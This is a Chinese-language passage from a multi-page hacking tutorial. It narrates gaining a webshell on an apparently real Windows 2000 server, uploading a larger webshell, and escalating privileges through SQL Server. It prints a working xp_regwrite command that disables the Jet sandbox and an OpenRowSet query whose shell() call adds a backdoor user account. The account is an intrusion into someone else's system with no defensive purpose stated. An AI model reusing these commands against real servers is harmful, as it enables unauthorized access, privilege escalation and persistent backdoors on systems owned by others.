四．成功获得ＷＥＢＳＨＥＬＬ

不过既然知道了WEB目录 就可以写一个一句话进去啦 语句如下

命令执行成功 看来一句话写进去了，马上使用客户端连一下，连接成功。


图7

马上传大马准备提权，服务器没什么第三方软件->开始→程序目录不能浏览，2000的操作系统，权限设置的还算严格，看一下终端，一看吓一跳，管理员把终端改成了21端口，第一次碰到。


图8

在WEBSHELL里转了半天还是没什么收获，感觉还是得靠那个SA来提权，于是笔者问了下朋友，他说你怎么忘了沙盒模式？
看来最近脑子晕了于是在查询分析器里执行：
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD','0'
意思是修改注册表，开启沙盒：
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user sadfish fish /add")');

上一页  [1] [2] [3] [4] [5] 下一页